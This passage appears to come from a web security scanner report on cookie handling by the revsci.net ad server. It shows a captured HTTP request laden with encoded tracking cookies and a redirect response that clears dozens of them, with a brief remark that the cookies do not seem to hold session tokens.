rsi_us_1000000="pUM14zlDOBYUrmdq3jOQH6NG/UTjJLypNPMu8j89fR48RnmECgKBWcP4HFOlhpV00nK/FOK7z+f1xdhwSIkT3DoXXrrgh3QjEwqdbVOUyQ1goAkAM4fvzRfWqdx53NjkHy5/7RHsmlLp6hyaqT427B/NL2MKYvFzk0ks3XZ+YYg32pjldWJXlRSttU1h3h9PAapjJW1UbsXnMK+8Dhb6DLu5iBq6oG41IZqUXDfdUInNnM88F7wL4iZiCreeyZL9ptxFPXuO5bNXKn7p4yvHazjOwwXpr2Srm6ydt+qXIJ5H7iNtlkTqE5r7kU5vwuYmm4epiLtLfOp+jJnsCnWXbsCynT7FgzE7GiBMpT/Yq2qs3VXCbrLRrs0AfyIlMYM1ytw5JoU0H1pKUlphxcLhmuOEr5MMJ5H000rSLsUn2FdHFbdWpFH8zatF00IohdmpslD3qcBobpD6JleEyUVy1RQ7GK/gAEYRViuseoPgkklzXw+Gu0eI+pek2JknCtWtMi1qWAqhdaJo+cboMZdV7rfd6A6QeJXsAiTADRfz9bTn0FWF/jMkLvNmhQSdPUYR5F/XPggT9vjQr67tO4Al/NQXfZ2kLbOpYL6lTS321CAsMkTQukduzc6GeCrANU9LISG2hKpCJfChlUYeqchZYUxp1Db0hGfT9VeHhWPvw5ZXaucFNAwYHP4Mi62YhKAFwKcNBXJTLdxChBJeIwrD70BBalQqKuPw59wlLMbuA5iGTlHyNpN3ID35wwsFw4Wlaz5CqV5iuCoSlk90KBQchxZXqT5wchoq7Reu+fUhbtkaxc0h5K8uIiXeXoen1GHuiITAAsohqJbyeAry4u2IwIensLcyktqs7Sh8H8oDg2m9PmXc6j9DdOae6l0wQZsIoMfp4eTN37ajU0mKv/jAAQNHDnA1LY6xlSBOziWy2ri6kSWQwaVMhh6u/JG81mi35R+UAbl3wsC1C9koQ3IKq0VGPBqfJdMSyrIrV/Gs+QZN9DAa9WlgHctmg3QGJGSmWVI88VCrIRm8zOG0aCjJ+G/CtLBRR2SCL2Qu2G5joYv7S0NQ/PbYGZj8H1F7PThoFktpAyKxmYOUiNidijH7NmwZrvYkwdgwyVP/eZooAAijNhuHJbyzffFypfSEMKSvR5bLpXKHcOeRyC0H6+3m4khQWoqJS5vF+mEVoeGJ2MSSVsAbGWROnuA+hnyG8Pzo1R0qr0XN/B+6B/NAkex3gYlWLQq4mWSCB7KHVKrgBqpuS/+yrnyTNvt/LnHsbkDQc3nfj5gpojxtWqtGaxK6HlGt1xn+TYqv6ysEBj2ZNmENFasNin6OlMNN7EyK4gVhuhY9LcuxtFk+HS1I00VGVpptg9BUvA5fZTgYPrLYygsTV0LVzEwy++xqwwojOpVYl+Ldj3i/qpbZAT1iNVPwu2DJ9Nd/rAVMSxUQ0eYAk7nR/R9H9myEBJgzxdRtxFRolf3JTCZSgIudcAm5wMEysXbNPuLAElHn1ReyHXlnjZTMA6XMmergjHuJ7hPO8x+pLvJ/wgM31/uQRMhMJ1TkCmBSY50PKtdAw9hWbUVwQoJGsikvwbPESmh3zKkHgZ7xHMtB/5uIiNF32GB/3PNuO3pFYM7Rq9Vwys3aen9Nk6ifIj2BWLywWJI9yOymM36+s66eR9eiXMF8PnNlCzsTTFAF5d1od8ZZ5sLo98tD863rScZQu8FU7bvWKon8L3rpFplKqLUqLfiLMB76TlD26LxoPefYCsiuamOqG7lTmmWBaAKEGRK1eWjmyHqg7lzDiA=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_random=335088361&rsi_pub=3D85C1146586C739B661E684D68085AA&rsi_site=6AC3786008071090B509A2610773031F&rsi_width=300&rsi_height=250&rsi_secure=0&rsi_url=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F677%2Fcnbc%2F300x250%2Fatf%3Ft%3D1308241078986%26tz%3D300%26m%3D0%26hu%3D%26ht%3Djs%26hp%3D0%26fo%3D%26url%3DUniversalAudiencePlatform23.com%26refer%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860&rsi_referrer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&rsi_title=&rsi_inf=1 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308241078986&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus_s5cG="MLsXtSMNJjhvJZH0ecXcxPALFPJgPeDE7NFqnKkHLx2BmYMObzB9/hpep6V9WP6iKbg+e3VA0m2LzBczWmMLdaJpq0puyTRQyGEfONQV6XrEbPpAc8e2VDA3Fy31gPZUZAJJsTqWaE97/6FPY2NufszctJYIDjVFtpyMpyCIElunN//cgZgF0uQAza2dosahuYJcuvsb4Mmoc6lkv9WbD3FYqLNEgTceYqMqHncmBdVUo+aMLOPUnNVMY74QZib5NVQs8YpdLFM5iwaoTFMO8KNu74BUc1x2mtz2QkiHglJytV7Ivihe3TNpqwl+Ehiqimxpb3M+r8O4Y+uAnsBFs7z8x3+/3jJS0ZbUKefBU5w/Z9nhfrfFt6njYVTUtKrMv363V4m0Cf1/VRsOeB/C0/9h7rLqbdrJ0PY1wY51YOzE32mIxyawgGWw2kcj1j4N8KRb9CicZvR9ANcTd1icA2wAQBf8KCt3tiANWmN8X6DWY6hWU6rDNpUSbRO2jlsbVNPqx7UL8WFj9sYIt8C9M2/axuMnFHdqQpiL4Ddn8cZcLAOwMm+JdzgcjoQx0in9SnyZgCUGEi/OvjeKJmTPMGFatSBajfJVTo1kpQi15L0BelSy1W0HTIZ1erqMVnEDnqeINDU7ufTgFMRm7zxfe8YYF+atyBupQ/TP1wC/GQeazkjq5PceKd+Rh7S9paOQL1yexe2vgGi7TGUbsrljHaKHRKHrC+d1Y9WfF8YngQcxajoOMmAZVd239wPQLFqRhR7p946PXCjInoCk9m5ON5YkS4YjFvDLP8IuCX+dcbKMUXYR2ohdiwLiwEfWxU7kF9cNkba8qxchQyQWHK3RDZTrjyIvi9f7dD7HXOwVIzRkbfIrkxYHCz380z0NqdkVk+NfaJkud+pggFL1HSwe53rGpLU0cokk+b7txcitPpIKQs3LBgeYp7nZvKa1Je2cPcX5bR4Z3OO/SoYugcKofD+IpniJb6xqWFh2w3lS2fXYgSInda8j+DU7c+Q9UbebkhpVujwFGdZbE9DbrHGoVX6TNyrEJCF2ZszL5FA2E+o/PiOFlVjmgaEhC91tcLPvTO1fUjpJ67A8tqfUW8xQivfPxFVgaoYREELaG47yk0hJ1tNMrqHHYWRL4k81veWq6ljDqeEQuBs6rFu6rTfDfuGcan5PS/RsAj1kLGzh1I7Ag5ETkZ233mGzpWMqZ3mX3HshobI5+orjs1jqw5p5n62EBU8LS+I51Zn8zVO7gRvzZdlnAbjTxgKT2b/KVmv7ketc94734OK2SI3b4/o23sooQC94NfJe7ybxeuhm4fQRY31M6xKA56x/AfmSTG7SqQGLd/SKIJrtrXMyV1azVRbo2Xg="; rsi_us_1000000="pUM14ymnMBYY7dXKYa7+iv3EgSSw/Y8tJ+gZNnYLLHa8d4Y1v0lUZEkxjU7NelY0QcHuDIduu0zKlUsklbhyJCnxDgB9CFQA1kPsZF7mtNPw4ptcL5Ctbrt5PUxGRUlQamUvZIBZOhHhqaWIknb5LxbfPjNdHiOI3+L71fEzWoRn+y4+5eRBTByQ7gkvqh/99HNVJg0Mhx7jT93632OtMFe7ldendZZd8NDEWPbpffS+GCpH6QqL2hsceChO/XL4EGbINZF9Qi2qEn7l9OZaOmvg0qDTl+Y3fcKZvr4j4pAF1BzxjmibF2GJbKtRn0KC35m5ml4Z5LApFxb/CiPL7JUl48ouIu7qWXjHBJeyxrMgxdOisTldj3/E2OpD+rwDxm9OZaG2T/zFtCloP6m0ZukU3G+1W79P+nS3NI8L/b1JRdufb7yEj0PWuyHmTy5ErQQkZdUhaSFExyU5KaSZGnOUmaSSK0KsNpkn9goI6RyOKRuCxqW6Y6L4x9LUrPiX/+AkKyLYUsAYUCgIQtU3UVO9MQ7M0nI0gHn/YOcrt8JEh3b6lbkVwvb+7pjF3OFasg6lsdnecccbs7u/mc8fAX83E9pgEmRJ3LXPHVktd2HeDBqBsrcxnSv0l6Zg78apOPubX52OcSFvO6lciUX9Q5DbN9BDF0xlk3R/0KGYOtUCvx0C1+NBg7oW9E+/J32wKoCCbBu4KL9NbqpY+903rH0fWmh8GrhAY0n5Y0P6kCXIiEmxLSOrAm5MEPF4CfEw304xSuEEGAkud/d8wWUH+9BvgKx3YYmyMRAf2ZeYdz8KlXfW1BcY02UtLT7xCy5wzegcvOR5I0exGUg17fF+94+6j4nAqVMvW7aenskzCS3f7yIvj/xieg+HlUh+WD8+dyUcDEudUTgOn/9p30D3exBHDmyySEaS+k4tEec0RxFpLAU/oKZ8XhjGz0wj2RXbp6SY+sNuvjEZu8Lk5wXl0HbnRMvv49BzNhMDxntv8UabacrPCXOEZIVi1FF89L0H4j+yIaHs+mOPlRho2lNn+2sKlIqwwqN4aD6+JY4EsIM3pOwuKZqhrxkjJAc4R4MzCiNSnTOHqcMa3UmEnzE5jfd+XTdxWu5s+vqVHcx3cglWcOZXgbOE9mIEDkGqQch7eV8z8LL5LVQOqf+ygnDRhf+74iN5EQimqqFyoPrE8QMYBZ7o9deP0HBNg8I5J217T4J6rTskxNbpP0KEAwZrsudLacKi/LuEST3eRY0mmovfb8FDkX5cThtKSjZ62BKyKY1xKzUSHJfsWvamEvP7t7VkdnDkFOoyET7+JpbrRHk9msl0dUtRT6O1laq7+hat06IJqZj2lbGE3P5PjBAOAYBoyFx2jV4j5rHPkKC/6nNmFnXlH6QXTLRmCFX2YuzoEsnzzB8MWwjzx7UydFwa0s2juTD+nN/bMLwgLPOnf/OUbyhDiHIa0Z40kEU+shFWFPkeNT7bS6lg54LBLPFDhXAVOvomNpZtrEDXtqzrjZjfH4lUilaps7Lfez4NizQRUzJyASf9Ra4CFDTBdqxuOSCVllk7hNyoMQueH5U19fbMVVZPfse3Nnnel4ve/OZ7ZPiCGWcLUzVuzy8J6tNZkg0CrA7ruA+yoVl0dhNtv2/cObm1BB7Z0gM2OdC6ziZzCp+FIqQuqM38KmUoIPecSyIgffoLHHUyLVnor0XG5lcqVU9+9ij6V+DDyNownTsAUJbfrpG2id1H5DgbX2xPi19xFIDOQ4pjg62D+R0v5EBMdQT6GTQxucssggWnTOsHXzbp6h4="; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47hsEu65JwcIlocE02QQ4O3XYyvheM/Ns0vAjloMpK61ewq2/t7wxEnZxc6hXT/TAhJnU0cgpqwwScHEsq8jKcVWn8biBJeiwj3bt/Z7Jno4eTUvRzGf2u88Dt+Xr5SMrCaDesP2v1b0OTJJ0SaxGkI/wp7+XJEJqbjRJx9w5bfXe8nwj2VXUacosCwLh4HW1pafBXtBaZ69LF3vwwNiRMOzM2hOzmIl3bkaNEsVIwrzqhtzkLb98whI1TyAiX4VXsMfxBwvwOTN3uNPwEJsPabBxQwHPp5/46LiCCA90/UyINB+lOenc2oXZx7bfxHZuTwOyjdiRgJsP1sXbC6eUwGWzLguW6SsMTBCG1D23QVRFUKOWM85CnTNYMCNXq3or7XEg8u2vvx0Y2vYif8fLD6jUtG/lMREU8yW7iI0DLsTrIFCkrm1kpy6i0cJxPYkHXgOPSTi5CoyeFhnHJRt6fLr+1OVRdX4nuCZzfuQ1VVG5sVtQXpfs93UPetTR+8CjuUaU8qI8jPKp1c+1oFzm2RW+nTi7lTLQCZ+axJebX8rUBsWyiOwvAlEla/ilc0yBK6+tzryJwZMa1HEpun+Puz+CpaUf+Y00G82XdBWMgeDBrpnrxVALpF12tvSNuZhoCA==

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_s5cG=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_evMS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_OvdF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_7Fof=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_zYUJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_YNkt=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_vvhk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_J1Ps=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_b8FU=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_mB1L=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Sjxc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_IDRv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ev9c=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_X4PT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus__0fe=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_N0iX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_D9lG=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_L6z4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DHsK=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_RWWj=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_5sIM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_BYLc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_RLoX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qW9_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tUOz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_X-Vm=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_iIbq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_2iyk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_GmIq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DDwn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_oq-t=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_GGsx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_RHZz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_bpJH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_FjqN=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_kTuc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_1cgA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Zj0S=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus__S9R=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_6dX6=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ERpj=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_GXWN=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_nkS4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qHFS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_gmtv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DsKn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_TtGD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_34v8=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ONLV=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
